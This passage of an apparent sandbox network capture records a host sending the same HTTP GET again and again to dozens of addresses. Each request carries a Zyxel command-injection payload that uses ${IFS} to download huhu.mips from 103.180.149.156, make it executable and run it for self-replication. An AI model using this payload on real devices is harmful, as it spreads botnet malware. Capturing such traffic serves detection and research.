                                                        Feb 2, 2024 06:21:30.340565920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9354192.168.2.1444284182.218.99.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340610027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9355192.168.2.1457944210.70.60.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340663910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9356192.168.2.1432914156.106.24.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340694904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9357192.168.2.1456866150.249.18.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340737104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9358192.168.2.1450792135.94.199.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340781927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9359192.168.2.145934261.11.229.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340831041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9360192.168.2.145257295.83.239.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340897083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9361192.168.2.144306495.93.61.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340938091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9362192.168.2.1434076140.214.155.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.340981960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9363192.168.2.1435816156.109.26.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341041088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9364192.168.2.1442228121.146.238.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341073990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9365192.168.2.145863825.224.161.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341104031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9366192.168.2.144499453.9.240.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341146946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9367192.168.2.145860284.144.116.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341169119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9368192.168.2.145415677.166.187.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341231108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9369192.168.2.1456724203.186.101.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341237068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9370192.168.2.1443370148.73.126.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341304064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9371192.168.2.1443020165.19.171.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341336012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9372192.168.2.1458752120.161.117.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341393948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9373192.168.2.144765044.184.206.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341413975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9374192.168.2.144611871.123.55.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341464996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9375192.168.2.1439660111.62.200.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341506004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9376192.168.2.1453058161.45.134.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341552019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9377192.168.2.144850281.245.5.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341592073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9378192.168.2.1454844218.119.85.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341619015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9379192.168.2.1444218110.219.149.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341653109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9380192.168.2.1451302150.131.27.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341691971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9381192.168.2.145433260.220.251.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341753006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9382192.168.2.1440396167.187.39.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341774940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9383192.168.2.1439136167.104.113.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341808081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9384192.168.2.1447830152.73.45.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341862917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9385192.168.2.1455600115.80.15.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341903925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9386192.168.2.1434312192.192.41.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341928005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9387192.168.2.144216263.238.186.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341958046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9388192.168.2.1448458129.144.179.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.341993093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9389192.168.2.1449188112.45.164.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342019081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9390192.168.2.144209266.136.170.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342073917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9391192.168.2.1444452107.219.173.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342111111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9392192.168.2.143838093.243.199.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342159033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9393192.168.2.143568045.175.30.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342181921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9394192.168.2.1440386198.98.185.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342221022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9395192.168.2.1457930221.84.254.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342274904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9396192.168.2.1437174171.72.52.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342312098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9397192.168.2.144672840.211.0.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342338085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9398192.168.2.1454110205.237.230.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342401028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9399192.168.2.1455344155.233.80.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342430115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9400192.168.2.1436126210.232.74.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342473030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9401192.168.2.1452706104.244.155.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342528105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9402192.168.2.1453446163.100.146.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342550039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9403192.168.2.1460872167.13.130.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342580080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9404192.168.2.1445358174.123.27.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342626095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9405192.168.2.144509858.146.59.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342678070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9406192.168.2.1444708125.232.177.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342704058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9407192.168.2.1459030126.67.157.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342756987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9408192.168.2.144321052.212.39.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342796087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9409192.168.2.143509262.242.111.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342833042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9410192.168.2.1432902104.70.255.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342900991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9411192.168.2.1435020132.99.2.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342935085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9412192.168.2.145764298.121.65.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.342971087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9413192.168.2.1460340137.58.166.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343033075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9414192.168.2.1437450220.156.111.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343033075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9415192.168.2.145447680.158.180.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343090057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9416192.168.2.1433716101.200.76.25443
                                                        TimestampBytes transferredDirectionData
